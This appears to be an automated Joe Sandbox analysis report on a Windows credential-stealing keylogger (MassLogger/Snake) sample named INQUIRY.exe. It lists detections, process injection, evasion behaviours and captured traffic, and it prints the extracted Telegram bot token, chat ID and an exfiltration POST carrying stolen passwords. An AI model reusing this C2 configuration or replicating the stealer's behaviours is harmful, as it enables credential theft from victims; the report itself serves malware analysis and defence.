Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
INQUIRY.exe

Overview

General Information

Sample name:INQUIRY.exe
Analysis ID:1580751
MD5:ba7b76b0763b1488a2aee0892bdbbf12
SHA1:630f66e0cde7e6830c24f51afc7f811c422a4ca7
SHA256:7d0dd6fef8949eb3e2a88946865f6c8cdd4444ea224a99caa547f3ce68cf5299
Tags:exeuser-threatcat_ch
Infos:

Detection

MassLogger RAT, PureLog Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected MassLogger RAT
Yara detected PureLog Stealer
Yara detected Telegram RAT
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code references suspicious native API functions
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Contains functionality to log keystrokes (.Net Source)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • INQUIRY.exe (PID: 7300 cmdline: "C:\Users\user\Desktop\INQUIRY.exe" MD5: BA7B76B0763B1488A2AEE0892BDBBF12)
    • RegSvcs.exe (PID: 7316 cmdline: "C:\Users\user\Desktop\INQUIRY.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
    • INQUIRY.exe (PID: 7324 cmdline: "C:\Users\user\Desktop\INQUIRY.exe" MD5: BA7B76B0763B1488A2AEE0892BDBBF12)
      • RegSvcs.exe (PID: 7348 cmdline: "C:\Users\user\Desktop\INQUIRY.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • cleanup

Malware Configuration

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot7708662779:AAH6Et2SseJQ86UUKPaQRakBrlKtq8QtlJg/sendMessage"}

Threatname: MassLogger

{"EXfil Mode": "Telegram", "Telegram Token": "7708662779:AAH6Et2SseJQ86UUKPaQRakBrlKtq8QtlJg", "Telegram Chatid": "5839829477"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.1694806382.0000000001DB0000.00000004.00001000.00020000.00000000.sdmpMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
  • 0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
  • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
  • 0x700:$s3: 83 EC 38 53 B0 AE 88 44 24 2B 88 44 24 2F B0 2B 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
  • 0x1ed8a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
  • 0x1e9d0:$s5: delete[]
  • 0x1de88:$s6: constructor or from DllMain.
00000003.00000002.4149427302.0000000000400000.00000040.80000000.00040000.00000000.sdmpMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
  • 0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
  • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
  • 0x1300:$s3: 83 EC 38 53 B0 AE 88 44 24 2B 88 44 24 2F B0 2B 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
  • 0x2018a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
  • 0x1fdd0:$s5: delete[]
  • 0x1f288:$s6: constructor or from DllMain.
00000003.00000002.4151695698.0000000003F81000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_MassLoggerYara detected MassLogger RATJoe Security
    00000003.00000002.4151695698.0000000003F81000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000003.00000002.4151695698.0000000003F81000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
        Click to see the 28 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        0.2.INQUIRY.exe.1db0000.1.raw.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
        • 0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
        • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
        • 0x700:$s3: 83 EC 38 53 B0 AE 88 44 24 2B 88 44 24 2F B0 2B 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
        • 0x1ed8a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
        • 0x1e9d0:$s5: delete[]
        • 0x1de88:$s6: constructor or from DllMain.
        3.2.RegSvcs.exe.400000.0.raw.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
        • 0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
        • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
        • 0x1300:$s3: 83 EC 38 53 B0 AE 88 44 24 2B 88 44 24 2F B0 2B 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
        • 0x2018a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
        • 0x1fdd0:$s5: delete[]
        • 0x1f288:$s6: constructor or from DllMain.
        3.2.RegSvcs.exe.3f86458.4.unpackJoeSecurity_MassLoggerYara detected MassLogger RATJoe Security
          3.2.RegSvcs.exe.3f86458.4.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            3.2.RegSvcs.exe.3f86458.4.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
              Click to see the 95 entries

              Sigma Signatures

              No Sigma rule has matched

              Suricata Signatures

              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-26T02:45:27.144850+010020577441Malware Command and Control Activity Detected192.168.2.449739149.154.167.220443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-26T02:45:16.025532+010028032742Potentially Bad Traffic192.168.2.449731193.122.6.16880TCP
              2024-12-26T02:45:25.025525+010028032742Potentially Bad Traffic192.168.2.449731193.122.6.16880TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-26T02:45:26.543698+010018100081Potentially Bad Traffic192.168.2.449739149.154.167.220443TCP

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Found malware configuration
              Source: 00000003.00000002.4151695698.0000000003F81000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: MassLogger {"EXfil Mode": "Telegram", "Telegram Token": "7708662779:AAH6Et2SseJQ86UUKPaQRakBrlKtq8QtlJg", "Telegram Chatid": "5839829477"}
              Source: RegSvcs.exe.7348.3.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7708662779:AAH6Et2SseJQ86UUKPaQRakBrlKtq8QtlJg/sendMessage"}
              Multi AV Scanner detection for submitted file
              Source: INQUIRY.exeVirustotal: Detection: 45%Perma Link
              Source: INQUIRY.exeReversingLabs: Detection: 47%
              AI detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Machine Learning detection for sample
              Source: INQUIRY.exeJoe Sandbox ML: detected

              Location Tracking

              barindex
              Tries to detect the country of the analysis system (by using the IP)
              Source: unknownDNS query: name: reallyfreegeoip.org
              Source: INQUIRY.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
              Source: unknownHTTPS traffic detected: 172.67.177.134:443 -> 192.168.2.4:49733 version: TLS 1.0
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49739 version: TLS 1.2
              Source: Binary string: _.pdb source: RegSvcs.exe, 00000003.00000002.4151695698.0000000003F81000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4152065561.00000000055A0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4150340194.0000000002CD0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdbUGP source: INQUIRY.exe, 00000000.00000003.1692742553.0000000003A10000.00000004.00001000.00020000.00000000.sdmp, INQUIRY.exe, 00000000.00000003.1693204373.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, INQUIRY.exe, 00000002.00000003.1707799950.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, INQUIRY.exe, 00000002.00000003.1704430637.0000000003A10000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdb source: INQUIRY.exe, 00000000.00000003.1692742553.0000000003A10000.00000004.00001000.00020000.00000000.sdmp, INQUIRY.exe, 00000000.00000003.1693204373.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, INQUIRY.exe, 00000002.00000003.1707799950.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, INQUIRY.exe, 00000002.00000003.1704430637.0000000003A10000.00000004.00001000.00020000.00000000.sdmp
              Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00A7445A GetFileAttributesW,FindFirstFileW,FindClose,0_2_00A7445A
              Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00A7C6D1 FindFirstFileW,FindClose,0_2_00A7C6D1
              Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00A7C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_00A7C75C
              Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00A7EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00A7EF95
              Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00A7F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00A7F0F2
              Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00A7F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00A7F3F3
              Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00A737EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00A737EF
              Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00A73B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00A73B12
              Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00A7BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00A7BCBC
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h3_2_02BA0EF8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov ecx, dword ptr [ebp-38h]3_2_06C67A32
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov ecx, dword ptr [ebp-38h]3_2_06C639A4

              Networking

              barindex
              Suricata IDS alerts for network traffic
              Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:49739 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.4:49739 -> 149.154.167.220:443
              Uses the Telegram API (likely for C&C communication)
              Source: unknownDNS query: name: api.telegram.org
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: POST /bot7708662779:AAH6Et2SseJQ86UUKPaQRakBrlKtq8QtlJg/sendDocument?chat_id=5839829477&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd25250e9b6ca7Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
              Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
              Source: Joe Sandbox ViewIP Address: 193.122.6.168 193.122.6.168
              Source: Joe Sandbox ViewIP Address: 172.67.177.134 172.67.177.134
              Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
              Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
              Source: unknownDNS query: name: checkip.dyndns.org
              Source: unknownDNS query: name: reallyfreegeoip.org
              Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49731 -> 193.122.6.168:80
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: unknownHTTPS traffic detected: 172.67.177.134:443 -> 192.168.2.4:49733 version: TLS 1.0
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00A822EE InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_00A822EE
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
              Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
              Source: global trafficDNS traffic detected: DNS query: api.telegram.org
              Source: unknownHTTP traffic detected: POST /bot7708662779:AAH6Et2SseJQ86UUKPaQRakBrlKtq8QtlJg/sendDocument?chat_id=5839829477&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd25250e9b6ca7Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
              Source: RegSvcs.exe, 00000003.00000002.4150460368.0000000003116000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
              Source: RegSvcs.exe, 00000003.00000002.4150460368.000000000306C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.com
              Source: RegSvcs.exe, 00000003.00000002.4150460368.000000000306C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4150460368.0000000003060000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4150460368.0000000003116000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
              Source: RegSvcs.exe, 00000003.00000002.4150460368.0000000002FE9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
              Source: RegSvcs.exe, 00000003.00000002.4151695698.0000000003F81000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4152396283.0000000005630000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4152065561.00000000055A0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4150340194.0000000002CD0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
              Source: RegSvcs.exe, 00000003.00000002.4150460368.000000000308D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.org
              Source: RegSvcs.exe, 00000003.00000002.4150460368.0000000002FE9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: RegSvcs.exe, 00000003.00000002.4150460368.0000000003116000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
              Source: RegSvcs.exe, 00000003.00000002.4150460368.0000000003116000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
              Source: RegSvcs.exe, 00000003.00000002.4151695698.0000000003F81000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4152396283.0000000005630000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4152065561.00000000055A0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4150340194.0000000002CD0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot-/sendDocument?chat_id=
              Source: RegSvcs.exe, 00000003.00000002.4150460368.0000000003116000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7708662779:AAH6Et2SseJQ86UUKPaQRakBrlKtq8QtlJg/sendDocument?chat_id=5839
              Source: RegSvcs.exe, 00000003.00000002.4150460368.000000000306C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
              Source: RegSvcs.exe, 00000003.00000002.4150460368.000000000306C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4151695698.0000000003F81000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4152396283.0000000005630000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4152065561.00000000055A0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4150340194.0000000002CD0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
              Source: RegSvcs.exe, 00000003.00000002.4150460368.000000000306C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
              Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
              Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49739 version: TLS 1.2

              Key, Mouse, Clipboard, Microphone and Screen Capturing

              barindex
              Contains functionality to log keystrokes (.Net Source)
              Source: 3.2.RegSvcs.exe.5630000.8.raw.unpack, UltraSpeed.cs.Net Code: VKCodeToUnicode
              Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00A84164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00A84164
              Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00A84164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00A84164
              Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00A83F66 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00A83F66
              Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00A7001C GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_00A7001C
              Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00A9CABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_00A9CABC

              System Summary

              barindex
              Malicious sample detected (through community Yara rule)
              Source: 0.2.INQUIRY.exe.1db0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
              Source: 3.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
              Source: 3.2.RegSvcs.exe.3f86458.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 3.2.RegSvcs.exe.3f86458.4.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
              Source: 3.2.RegSvcs.exe.55a0000.7.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 3.2.RegSvcs.exe.55a0000.7.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 3.2.RegSvcs.exe.3fae590.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 3.2.RegSvcs.exe.3fae590.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 3.2.RegSvcs.exe.55a0000.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 3.2.RegSvcs.exe.55a0000.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 3.2.RegSvcs.exe.2d10bbe.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 3.2.RegSvcs.exe.2d10bbe.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 3.2.RegSvcs.exe.3fae590.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 3.2.RegSvcs.exe.3fae590.5.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 3.2.RegSvcs.exe.55a0ee8.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 3.2.RegSvcs.exe.55a0ee8.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 3.2.RegSvcs.exe.3f86458.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 2.2.INQUIRY.exe.1de0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
              Source: 3.2.RegSvcs.exe.3f86458.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 3.2.RegSvcs.exe.2d10bbe.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 3.2.RegSvcs.exe.2d10bbe.1.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 3.2.RegSvcs.exe.3f85570.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 3.2.RegSvcs.exe.3f85570.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 3.2.RegSvcs.exe.55a0ee8.6.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
